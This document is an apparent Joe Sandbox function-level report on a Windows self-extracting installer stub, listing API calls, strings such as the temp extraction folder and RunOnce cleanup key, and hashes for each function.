                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3183975587-3916222277
                                                                                                                      • Opcode ID: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                      • Instruction ID: 9f71fc2020343ae810f0ccc511d12b6c64d5f7ce5e07e1d3662ccbb34043b13c
                                                                                                                      • Opcode Fuzzy Hash: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                      • Instruction Fuzzy Hash: 3E512C3291AA85C6E760AB50F4583FAF7A0FB88B65F844135FA4D466A4CFBCD444CB20

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                      • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                      • API String ID: 1302179841-1204263913
                                                                                                                      • Opcode ID: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                      • Instruction ID: c2e69b999fd8ff6eeea8f1cdd89ff8b0b29246d1a33ec12e1d5911018119ed20
                                                                                                                      • Opcode Fuzzy Hash: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                      • Instruction Fuzzy Hash: 3A310C21A0AA42C6FB64BB60B4582F9E7A0BF59F60FC44135FA4D02695DFBDE4408720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 836429354-0
                                                                                                                      • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                      • Instruction ID: 0397b09d8e8ada5c45ce87893ae529529ba72e286640834c0a68ef3bc23588b6
                                                                                                                      • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                      • Instruction Fuzzy Hash: 92515C3160AA86D5EB11AF20F8582F8B7A1FB45F94FC48171EA4E07695DFBDD509C320

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                      • String ID: $Adv
                                                                                                                      • API String ID: 2654313074-3776740653
                                                                                                                      • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                      • Instruction ID: 197bb355ea3eb86f1193aee72240e622c01a096de39620f566a29ae37c5fcac6
                                                                                                                      • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                      • Instruction Fuzzy Hash: D3514F31A0A643C6F750AB15F95C2F9EBA1FB89F65F849231E91E02794CFBC90458720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                      • API String ID: 3049360512-3137473940
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                      • String ID: IXP$IXP%03d.TMP
                                                                                                                      • API String ID: 1082909758-3932986939
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2995914023-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF761F73123), ref: 00007FF761F760C9
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F76142
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                        • Part of subcall function 00007FF761F77700: GetLastError.KERNEL32 ref: 00007FF761F77704
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                      • String ID: $<None>$UPROMPT
                                                                                                                      • API String ID: 957408736-2569542085
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile$lstrcmp
                                                                                                                      • String ID: *MEMCAB
                                                                                                                      • API String ID: 1301100335-3211172518
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 1150793416-305352358
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2212493051-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocLocal
                                                                                                                      • String ID: TMP4351$.TMP
                                                                                                                      • API String ID: 3494564517-2619824408
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1214682469-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F73B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF761F73A09), ref: 00007FF761F73B64
                                                                                                                        • Part of subcall function 00007FF761F73B40: PeekMessageA.USER32 ref: 00007FF761F73B89
                                                                                                                        • Part of subcall function 00007FF761F73B40: PeekMessageA.USER32 ref: 00007FF761F73BCD
                                                                                                                      • WriteFile.KERNELBASE ref: 00007FF761F756E4
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1084409-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2018477427-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrev
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 122130370-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                      • String ID: $Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 3530494346-2714610706
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 2829607268-3733053543
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104442557-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                      • String ID: "$:$@$RegServer
                                                                                                                      • API String ID: 1203814774-4077547207
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74A86
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74AAA
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74ACA
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74AEC
                                                                                                                      • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B1B
                                                                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B3A
                                                                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B54
                                                                                                                      • FreeLibrary.KERNEL32 ref: 00007FF761F74BF1
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74C0D
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                      Similarity
                                                                                                                      • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                      • String ID: Adv$rce.
                                                                                                                      • API String ID: 2929476258-1496161719
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 3785188418-921584719
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2168512254-0
                                                                                                                      Similarity
                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1051330783-0
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 975904313-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F73F95
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F74018
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                        • Part of subcall function 00007FF761F77700: GetLastError.KERNEL32 ref: 00007FF761F77704
                                                                                                                      • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F7403E
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F7409F
                                                                                                                        • Part of subcall function 00007FF761F77AC8: FindResourceA.KERNEL32 ref: 00007FF761F77AF2
                                                                                                                        • Part of subcall function 00007FF761F77AC8: LoadResource.KERNEL32 ref: 00007FF761F77B09
                                                                                                                        • Part of subcall function 00007FF761F77AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF761F77B3F
                                                                                                                        • Part of subcall function 00007FF761F77AC8: FreeResource.KERNEL32 ref: 00007FF761F77B51
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F74078
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F7114C: _vsnprintf.MSVCRT ref: 00007FF761F71189
                                                                                                                      • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77763
                                                                                                                      • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77772
                                                                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F777B8
                                                                                                                      • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F777EC
                                                                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77805
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3370778649-0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                      • String ID: wininit.ini
                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 761066910-921584719
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF761F73388), ref: 00007FF761F74975
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF761F73388), ref: 00007FF761F74A11
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                      • String ID: <None>$@$FINISHMSG
                                                                                                                      • API String ID: 3507850446-4126004490
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                      • API String ID: 438848745-3680919256
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
